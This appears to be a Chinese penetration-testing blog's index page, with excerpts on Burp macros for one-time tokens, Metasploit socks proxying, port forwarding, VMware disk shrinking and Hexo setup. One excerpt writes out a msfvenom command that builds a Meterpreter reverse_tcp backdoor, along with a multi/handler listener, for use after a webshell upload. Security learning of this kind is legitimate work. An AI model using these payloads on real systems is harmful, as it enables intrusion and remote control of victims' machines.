0%

本文仅作为技术讨论及分享,严禁用于任何非法用途。

前言

在WEB渗透中经常可以看到页面存在一次性token校验的情况,即请求包中包含token,而token值需通过其它页面获取,导致burpsuite抓包后无法重放。

开始

下面以一个简单例子来做个说明。目标网站如下,页面存在一个图片验证码,题目要求暴力破解得到账号密码。这题可以有多种方式实现,这里以burpsuite宏进行实验。

阅读全文 »

本文仅作为技术讨论及分享,严禁用于任何非法用途。

前言

最近在使用msf转发流量时遇到了个问题,就是使用auxiliary/server/socks4a做代理时,burpsuite不支持socks4a代理,导致无法使用burp去抓包。而使用auxiliary/server/socks5做代理却失败了,可能是脚本的bug,官方issues也有人反馈这个问题。

具体问题

演示环境

我所在的环境比较特殊,工作机(192.168.1.2,Windows)位于A地内网,MSF机器(172.16.1.2,Linux)位于B地内网,两内网不相通,但是可以通过11.11.11.11:22 SSH访问MSF机器,遂用SSH隧道将172.16.1.2:11080端口转发到工作机的127.0.0.1:1083端口,如果不清楚这个操作,可以理解为工作机访问本机127.0.0.1:1083端口等价于访问MSF机172.16.1.2:11080端口。

阅读全文 »

可以使用VMware官方的vmware tools进行压缩。
压缩前需要删除虚拟机的快照、链接克隆等,然后在虚拟机中执行:

1
vmware-toolbox-cmd disk shrink /

执行后等待进度条结束即可:

阅读全文 »

本文仅作为技术讨论及分享,严禁用于任何非法用途。

通过任意文件上传获取到ASP webshell

生成msf meterpreter后门

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > shell1.exe  

启动监听

1
2
3
4
5
use exploit/multi/handler  
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT xx
exploit
阅读全文 »

一、前言

熟练的代理转发,既可助你穿梭内网,亦可在工作生活中提供便利。理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的。

二、端口转发

把端口接收到的流量转发到另外一个端口,可以是本机的端口,也可以是其它网络的端口。
实现原理:基于传输层协议,把socket字节流原封不动进行转发。
弊端:如果上层协议有校验,会出错。比如HTTP协议中部分WEB服务会校验host头,导致HTTP连接中断。

阅读全文 »

前言

因一次意外,hexo博客源码被删除干净,抽空重新配置hexo并重新写了之前的文章,这里把配置hexo各项功能作个记录。

hexo版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
λ hexo version
hexo-cli: 4.2.0
os: Windows_NT 10.0.18363 win32 x64
node: 12.18.3
v8: 7.8.279.23-node.39
uv: 1.38.0
zlib: 1.2.11
brotli: 1.0.7
ares: 1.16.0
modules: 72
nghttp2: 1.41.0
napi: 6
llhttp: 2.0.4
http_parser: 2.9.3
openssl: 1.1.1g
cldr: 37.0
icu: 67.1
tz: 2019c
unicode: 13.0

安装next主题

1
2
$ cd hexo
$ git clone https://github.com/theme-next/hexo-theme-next themes/next

创建 “关于我” 页面

新建一个 about 页面:

1
hexo new page "about"

菜单显示 about 链接,在主题的 _configy.yml 设置中将 menu 中 about 前面的注释去掉即可。

1
2
3
4
5
menu:
home: /
archives: /archives
tags: /tags
about: /about
阅读全文 »